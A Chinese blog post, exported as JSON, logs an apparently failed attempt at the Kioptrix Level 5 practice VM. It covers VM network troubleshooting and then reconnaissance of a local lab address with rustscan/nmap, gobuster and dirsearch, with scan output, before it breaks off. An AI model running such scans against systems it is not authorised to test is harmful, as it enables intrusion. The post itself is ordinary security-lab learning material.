{"id":331,"date":"2024-01-29T22:18:51","date_gmt":"2024-01-29T14:18:51","guid":{"rendered":"http:\/\/162.14.82.114\/?p=331"},"modified":"2024-01-29T22:18:51","modified_gmt":"2024-01-29T14:18:51","slug":"kioptrix-level-5%ef%bc%88%e5%a4%b1%e8%b4%a5%ef%bc%89","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/331\/01\/29\/2024\/","title":{"rendered":"KIOPTRIX LEVEL 5\uff08\u5931\u8d25\uff09"},"content":{"rendered":"<h1>KIOPTRIX LEVEL 5\uff08\u5931\u8d25\uff09<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217151.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217151.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128160520795\" \/><\/div><\/p>\n<h2>\u6f2b\u957f\u7684debug\uff08\u7f51\u5361\u65e0\u6cd5\u8fde\u63a5\/\u65e0\u6cd5\u83b7\u53d6IP\uff09<\/h2>\n<p>\u6253\u5f00\u73af\u5883\uff0c\u5982\u679c\u83b7\u53d6\u4e0d\u5230IP\u7684\u8bdd\uff0c\u53ef\u4ee5\u4fee\u6539\u4e00\u4e0b<code>.vmx<\/code>\uff0c\u5c06\u6865\u63a5\u6a21\u5f0f\u6539\u4e3a<code>NAT<\/code>\uff0c\u6253\u5f00\u4ee5\u540e\u53d1\u73b0\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217152.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217152.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128163309166\" style=\"zoom: 67%;\" \/><\/div><\/p>\n<p>\u626b\u4e00\u4e0b\uff0c\u4e0d\u9614\u4ee5\u626b\u5230\u3002\u3002\u3002\u3002\u90a3\u5c31\u6309\u4e0a\u4e00\u671f\u7684\u64cd\u4f5c\uff0c\u521b\u5efa\u865a\u62df\u673a\uff0c\u5220\u9664\u7f51\u5361\uff0c\u52a0\u8f7d\u7ed9\u7684\u7f51\u5361\u518d\u6b21\u5c1d\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217154.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217154.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128172543800\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f5c\u8005\u8bf4\u572810\u4e0a\u767e\u5206\u767e\u652f\u6301\u7684\uff0c\u4e0d\u8282\u5916\u751f\u679d\u4e86\uff08\u5b9e\u9645\u4e0a\u8e29\u5751\u4e86\uff0c\u5047\u88c5\u6ca1\u8e29\uff09\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217155.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217155.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128172843901\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u8fd8\u662f\u5bc4\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217156.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217156.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128173253191\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u626b\u4e0d\u51fa\u6765\u4e00\u70b9\u70b9\u3002\u3002\u3002\u3002\u518d\u5c06\u539f\u6709\u7684<code>.vmx<\/code>\u6253\u5f00\uff0c\u7136\u540e\u5c06\u786c\u76d8\u5220\u9664\uff0c\u91cd\u65b0\u6dfb\u52a0\uff0c\u51fa\u73b0\u4e86\u4ee5\u4e0b\u754c\u9762\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217157.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217157.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128174716317\" style=\"zoom: 67%;\" \/><\/div><\/p>\n<p>\u641c\u7d22\uff0c\u641c\u5230\u4e86\u4e00\u7bc7\u7591\u4f3c[\u89e3\u7b54](<a href=\"https:\/\/zhuanlan.zhihu.com\/p\/655396834\">Kioptrix: 2014 - \u77e5\u4e4e (zhihu.com)<\/a>)\uff0c\u8f93\u5165\u4e0b\u9762\u4ee3\u7801\u4ee5\u540e\uff0c\u987a\u5229\u6253\u5f00\uff1a<\/p>\n<pre><code class=\"language-bash\">ufs:\/dev\/ada0p2<\/code><\/pre>\n<p>\u4f46\u95ee\u9898\u8fd8\u662f\u6ca1\u6709\u5f97\u5230\u89e3\u51b3\u3002\u3002\u3002\u6309\u7167\u5b98\u7f51\u8fdb\u884c\u4fee\u6539\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217158.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217158.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128175851571\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd9\u4e2a\u662f\u6211\u76f4\u63a5\u4fee\u6539\u7684\uff0c\u4e0d\u884c\uff0c\u5f97\u6309\u7167\u4e0b\u9762\u5b98\u65b9\u9776\u573a\u5199\u7684\u6765\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217159.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217159.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128180132217\" \/><\/div><\/p>\n<p>\u51fa\u73b0\u62a5\u9519\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217160.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217160.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128180557740\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u5347\u7ea7\u523010\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217161.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217161.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128180700206\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u6253\u5f00\uff0c\u8fd8\u662f\u641e\u4e0d\u4e86\u3002\u3002\u3002\u3002\u3002\u3002\u6de6\uff01\u653e\u98de\u81ea\u6211\uff0c\u778e\u51e0\u628a\u6539\u4e86\uff0c\u8fd9\u4e2a\u9776\u573a\u6682\u65f6\u505a\u4e0d\u4e86\uff0c\u5148\u4e0d\u641e\u4e86\u3002<\/p>\n<p>\u6ce8\u610f\u5230\u62a5\u9519\uff1a<code>vmware \u201dscsi0:0\u201c\u5df2\u65ad\u5f00<\/code>\uff0c\u641c\u7d22\u5230\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217162.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217162.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128181539665\" \/><\/div><\/p>\n<p>\u6211\u76f4\u63a5\u5c06\u6240\u6709\u7684\u914d\u7f6e\u5168\u90e8\u5220\u9664\u518d\u6dfb\u52a0\uff01<\/p>\n<p>\u7ed3\u679c\u53c8\u51fa\u4e86\u9519\u8bef<code>folppy()\u65ad\u5f00\u8fde\u63a5<\/code>\u8fd8\u6709<code>\u65e0\u6cd5\u8fde\u63a5\u865a\u62df\u8bbe\u5907 ide0:1\uff0c\u56e0\u4e3a\u4e3b\u673a\u4e0a\u6ca1\u6709\u76f8\u5e94\u7684\u8bbe\u5907\u3002<\/code><\/p>\n<p>\u6253\u5f00\u53d1\u73b0\u53ef\u4ee5\u626b\u5230\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217163.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217163.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128181942221\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6211\u771f\u7684\u8981tu\u4e86\uff0c\u4e3a\u4e86\u4ee5\u9632\u4e07\u4e00\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\u662f\u4e0d\u662f\u9776\u573a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217164.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217164.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128182024288\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>work\u4e0d\u4e86\u4e00\u70b9\uff0c\u6211\u76f4\u63a5\u7ed9\u4f60\u4e00\u62f3\uff08\u5f00\u73a9\u7b11\u7684\uff0c\u8fd8\u662f\u611f\u8c22\u5e08\u5085\u8010\u5fc3\u505a\u9776\u573a\uff0c\u975e\u5e38\u611f\u8c22\uff01\uff01\uff01\uff09<\/p>\n<p>\u4e0b\u9762\u5f00\u59cb\u653b\u51fb\uff01<\/p>\n<blockquote>\n<p>\u8fd9\u91cc\u540e\u6765\u53d1\u73b0\u4f5c\u8005\u8bf4\u4e86\u4e00\u4e0b\u4ed6\u7684\u9776\u573a\u9700\u8981\u91cd\u65b0\u66f4\u6362\u7f51\u7edc\u9002\u914d\u5668\u3002<\/p>\n<\/blockquote>\n<h2>\u8e29\u70b9\u4e00\u4e0b<\/h2>\n<p>\u67e5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u4e86\u4e00\u4e2a<code>pChart 2.1.3<\/code>\u914d\u7f6e\uff0c\u67e5\u770b\u4e00\u4e0b<code>wappalyzer<\/code>\u5206\u6790\u51fa\u6765\u7684\u670d\u52a1\u5668\u76f8\u5173\u914d\u7f6e\uff1a<\/p>\n<pre><code class=\"language-html\">&lt;html&gt;\n &lt;head&gt;\n  &lt;!--\n  &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;5;URL=pChart2.1.3\/index.php&quot;&gt;\n  --&gt;\n &lt;\/head&gt;\n &lt;body&gt;\n  &lt;h1&gt;It works!&lt;\/h1&gt;\n &lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217165.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217165.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129142514654\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u6ca1\u6709<code>robots.txt<\/code>\u6587\u4ef6\u3002<\/p>\n<h2>\u7aef\u53e3\u626b\u63cf<\/h2>\n<pre><code class=\"language-shell\">rustscan -a 192.168.244.144 --ulimit 5000\n# .----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n# | {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n# | .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n# `-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\n# The Modern Day Port Scanner.\n# ________________________________________\n# : https:\/\/discord.gg\/GFrQsGy           :\n# : https:\/\/github.com\/RustScan\/RustScan :\n#  --------------------------------------\n# Nmap? More like slowmap.\ud83d\udc22\n\n# [~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n# [~] Automatically increasing ulimit value to 5000.\n# Open 192.168.244.144:80\n# Open 192.168.244.144:8080\n# [~] Starting Script(s)\n# [&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)                                                                                                                         \n# [~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-01-29 01:27 EST                   \n# Initiating Ping Scan at 01:27                                                           \n# Scanning 192.168.244.144 [2 ports]                                                       \n# Completed Ping Scan at 01:27, 0.00s elapsed (1 total hosts)                             \n# Initiating Parallel DNS resolution of 1 host. at 01:27                                   \n# Completed Parallel DNS resolution of 1 host. at 01:27, 2.16s elapsed                     \n# DNS resolution of 1 IPs took 2.16s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]                                                                                 \n# Initiating Connect Scan at 01:27                                                         \n# Scanning 192.168.244.144 [2 ports]                                                       \n# Discovered open port 8080\/tcp on 192.168.244.144                                         \n# Discovered open port 80\/tcp on 192.168.244.144                                           \n# Completed Connect Scan at 01:27, 0.00s elapsed (2 total ports)                           \n# Nmap scan report for 192.168.244.144                                                     \n# Host is up, received syn-ack (0.00056s latency).                                         \n# Scanned at 2024-01-29 01:27:12 EST for 0s                                               \n# PORT     STATE SERVICE    REASON                                                         \n# 80\/tcp   open  http       syn-ack                                                       \n# 8080\/tcp open  http-proxy syn-ack                                                       \n# Read data files from: \/usr\/bin\/..\/share\/nmap                                             \n# Nmap done: 1 IP address (1 host up) scanned in 2.24 seconds<\/code><\/pre>\n<p>\u53d1\u73b0\u5f00\u653e\u4e86<code>80<\/code>\u548c<code>8080<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u770b\u770b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217166.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217166.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129143231388\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217167.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217167.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129143258344\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u76ee\u5f55\u626b\u63cf<\/h2>\n<pre><code class=\"language-shell\">gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/192.168.244.144 -f -t 200\n# dir: \u6307\u793aGobuster\u6267\u884c\u76ee\u5f55\u626b\u63cf\u3002\n# -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt: \u6307\u5b9a\u7528\u4e8e\u626b\u63cf\u7684\u5b57\u5178\u6587\u4ef6\u7684\u8def\u5f84\u548c\u6587\u4ef6\u540d\u3002\n# -u http:\/\/192.168.244.144: \u6307\u5b9a\u8981\u626b\u63cf\u7684\u76ee\u6807URL\u3002\n# -f: \u5728\u8f93\u51fa\u4e2d\u663e\u793a\u5b8c\u6574\u7684URL\u8def\u5f84\u3002\n# -t 200: \u6307\u5b9a\u7ebf\u7a0b\u6570\uff0c\u8fd9\u91cc\u8bbe\u7f6e\u4e3a200\u3002<\/code><\/pre>\n<p>\u9047\u5230\u4e86\u62a5\u9519\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217168.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217168.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129150354641\" \/><\/div><\/p>\n<p>\u6362dirsearch\uff0c\u867d\u7136\u6ca1\u6709\u62a5\u9519\uff0c\u4f46\u662f\u4e5f\u4e00\u65e0\u6240\u83b7\uff1a<\/p>\n<pre><code class=\"language-shell\">\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ dirsearch -u http:\/\/192.168.244.144\/ -e* -x 404,403 \n\/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https:\/\/setuptools.pypa.io\/en\/latest\/pkg_resources.html\n  from pkg_resources import DistributionNotFound, VersionConflict\n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| 